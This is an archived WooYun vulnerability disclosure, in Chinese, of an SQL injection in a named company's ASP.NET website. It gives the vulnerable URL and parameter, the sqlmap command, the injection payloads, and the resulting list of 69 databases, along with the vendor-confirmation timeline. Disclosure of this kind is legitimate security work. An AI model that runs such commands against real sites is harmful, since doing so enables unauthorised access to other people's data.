乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2015-02-04: 细节已通知厂商并且等待厂商处理中 2015-02-05: 厂商已经确认,细节仅向厂商公开 2015-02-15: 细节向核心白帽子及相关领域专家公开 2015-02-25: 细节向普通白帽子公开 2015-03-07: 细节向实习白帽子公开 2015-03-21: 细节向公众公开
http://www.zte-v.com.cn
中兴长天信息技术(南昌)有限公司是中兴通讯集团公司体系下的高科技公司,公司主要从事RFID、水利及WSN等领域软件及硬件产品的研发,提供全面的、系统的水利、RFID及WSN应用解决方案,研发团队具有十多年信息化建设解决方案的经验。存在SQL注入漏洞,出现问题的地方:
http://www.zte-v.com.cn/Plus/SubForm.aspx?FID=2&NodeID=35
NodeID参数有问题。
sqlmap.py -u "http://www.zte-v.com.cn/Plus/SubForm.aspx?FID=2&NodeID=35" -p NodeID --dbs
sqlmap identified the following injection points with a total of 104 HTTP(s) requests:---Place: GETParameter: NodeID Type: error-based Title: Microsoft SQL Server/Sybase error-based - Parameter replace Payload: FID=2&NodeID=(CONVERT(INT,(SELECT CHAR(113)+CHAR(105)+CHAR(101)+CHAR(105)+CHAR(113)+(SELECT (CASE WHEN (3317=3317) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(118)+CHAR(115)+CHAR(121)+CHAR(113)))) Type: inline query Title: Microsoft SQL Server/Sybase inline queries Payload: FID=2&NodeID=(SELECT CHAR(113)+CHAR(105)+CHAR(101)+CHAR(105)+CHAR(113)+(SELECT (CASE WHEN (9401=9401) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(118)+CHAR(115)+CHAR(121)+CHAR(113))---web server operating system: Windowsweb application technology: ASP.NET, ASP.NET 0back-end DBMS: Microsoft SQL Server 2008sqlmap identified the following injection points with a total of 0 HTTP(s) requests:---Place: GETParameter: NodeID Type: error-based Title: Microsoft SQL Server/Sybase error-based - Parameter replace Payload: FID=2&NodeID=(CONVERT(INT,(SELECT CHAR(113)+CHAR(105)+CHAR(101)+CHAR(105)+CHAR(113)+(SELECT (CASE WHEN (3317=3317) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(118)+CHAR(115)+CHAR(121)+CHAR(113)))) Type: inline query Title: Microsoft SQL Server/Sybase inline queries Payload: FID=2&NodeID=(SELECT CHAR(113)+CHAR(105)+CHAR(101)+CHAR(105)+CHAR(113)+(SELECT (CASE WHEN (9401=9401) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(118)+CHAR(115)+CHAR(121)+CHAR(113))---web server operating system: Windowsweb application technology: ASP.NET, ASP.NET 0back-end DBMS: Microsoft SQL Server 2008available databases [69]:[*] BDQN_cn[*] chengjumeng[*] chengmingshi[*] daikuan[*] daikuan1[*] dongshengzhongzhu[*] DT_hr[*] DT_sys[*] fenghuang[*] FindDemo[*] fuzhouyuqixuexiao[*] GaoSheng[*] haohanguanwang[*] hongrunhuagong[*] jiangxiguomei[*] jingpinkecheng[*] jinpaizhoupu[*] jiuzhongyuantaoci[*] jxjn[*] kangsheng[*] kongtiao[*] KongTiao02130401[*] kongtiao2[*] kunyuanduanxinpingtai_1[*] lianjing[*] loushanglou[*] lvdu[*] master[*] MAXAN[*] MeiRongMeiFa[*] message[*] model[*] msdb[*] nankeshipin[*] nchkyyxy[*] NPSMSPlatform[*] OAManage[*] pulangke[*] ReportServer[*] ReportServerTempDB[*] shekewang[*] shenzhengtaoci[*] shuguangjituan[*] shuilishuidian[*] shuiwujituan[*] shunshengjiangong[*] StudentFrance[*] tempdb[*] tongkangjiancai[*] Tour1[*] Tour2[*] UFDATA_800_2014[*] UFDATA_800_2015[*] UfNoteSys[*] web8848_7[*] weishengxinxi[*] wit_oa[*] xinxiwang[*] XinXiWang2[*] Yd1[*] yinkuaizi[*] youdiantian[*] yumingqiangzhu1[*] ZFKJ_SYXT[*] ZFKJ_ZHJJ[*] zhengxinshalun[*] zhengzhongtang[*] zhongxingchangtian[*] Zufeng_HuaKai
69个库,不跑了!
危害等级:高
漏洞Rank:12
确认时间:2015-02-05 13:40
感谢~
暂无